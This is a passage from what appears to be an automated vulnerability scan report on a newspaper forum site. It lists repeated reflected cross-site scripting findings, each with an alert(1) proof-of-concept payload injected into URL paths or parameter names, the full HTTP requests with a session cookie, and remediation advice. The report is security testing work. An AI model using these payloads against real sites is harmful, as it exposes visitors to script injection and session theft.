User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:06:51 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21162
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2deab"-alert(1)-"4a706fc981a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic2deab"-alert(1)-"4a706fc981a/oil-and-iran-war HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:14 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:38 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22122
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title ...[SNIP]... anguage="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topic2deab"-alert(1)-"4a706fc981a/oil-and-iran-war"; s.prop9=getCiQueryString("SOURCE"); s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF"); s.events="event1"; s.eVar2=getCiQueryString("SOURCE"); s.eVar4=s.pageName; s ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96781"-alert(1)-"1dccca72dc8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/oil-and-iran-war96781"-alert(1)-"1dccca72dc8 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:29 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:53 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22122
1.63. http://forums.mercurynews.com/topic/oil-and-iran-war [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://forums.mercurynews.com
Path: /topic/oil-and-iran-war
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 195d3"-alert(1)-"bbdb9078104 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/oil-and-iran-war?195d3"-alert(1)-"bbdb9078104=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:07:01 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:25 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23342
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bdef6"-alert(1)-"abaffde0a85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topicbdef6"-alert(1)-"abaffde0a85/oil-price-and-iran-war HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:09 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22134
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7b93"-alert(1)-"c1260fb02e0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/oil-price-and-iran-warb7b93"-alert(1)-"c1260fb02e0 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:14 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:38 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22134
1.66. http://forums.mercurynews.com/topic/oil-price-and-iran-war [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://forums.mercurynews.com
Path: /topic/oil-price-and-iran-war
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 363f2"-alert(1)-"de8dec15453 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/oil-price-and-iran-war?363f2"-alert(1)-"de8dec15453=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:06:59 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:23 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 98092
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe5e4"-alert(1)-"7be3daf7363 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topicfe5e4"-alert(1)-"7be3daf7363/pentagon-cant-explain-missile-off-california HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:09 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22178
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64259"-alert(1)-"06154ffc603 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/pentagon-cant-explain-missile-off-california64259"-alert(1)-"06154ffc603 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:22 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:46 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22178
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab401"-alert(1)-"0432824b438 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/pentagon-cant-explain-missile-off-california?ab401"-alert(1)-"0432824b438=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:07:03 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19412
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d4a7"-alert(1)-"28a781fd586 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic8d4a7"-alert(1)-"28a781fd586/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:58 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22218
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e3d4"-alert(1)-"47d584067f5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy1e3d4"-alert(1)-"47d584067f5 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:07 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:31 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22218
1.72. http://forums.mercurynews.com/topic/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20852"-alert(1)-"14a59680a3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy?20852"-alert(1)-"14a59680a3a=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:06:54 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:18 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23285
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a503"-alert(1)-"208a5264286 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic4a503"-alert(1)-"208a5264286/war-crisis-in-september HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:27 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22136
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b33de"-alert(1)-"add33b46077 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/war-crisis-in-septemberb33de"-alert(1)-"add33b46077 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:33 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:57 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22136
1.75. http://forums.mercurynews.com/topic/war-crisis-in-september [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://forums.mercurynews.com
Path: /topic/war-crisis-in-september
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57abb"-alert(1)-"ea4b545c8c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/war-crisis-in-september?57abb"-alert(1)-"ea4b545c8c0=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:07:18 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 162532
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34def"-alert(1)-"a6f704bab09 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /xml34def"-alert(1)-"a6f704bab09/comments HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:26 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22102
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df349"-alert(1)-"078e172cde1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /xml/commentsdf349"-alert(1)-"078e172cde1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:40 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:04 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22102
1.78. http://forums.mercurynews.com/xml/comments [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://forums.mercurynews.com
Path: /xml/comments
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1a8b"-alert(1)-"d726d012b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /xml/comments?c1a8b"-alert(1)-"d726d012b6=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:19 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:43 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22068
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ff9b"-alert(1)-"3afa300d7b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
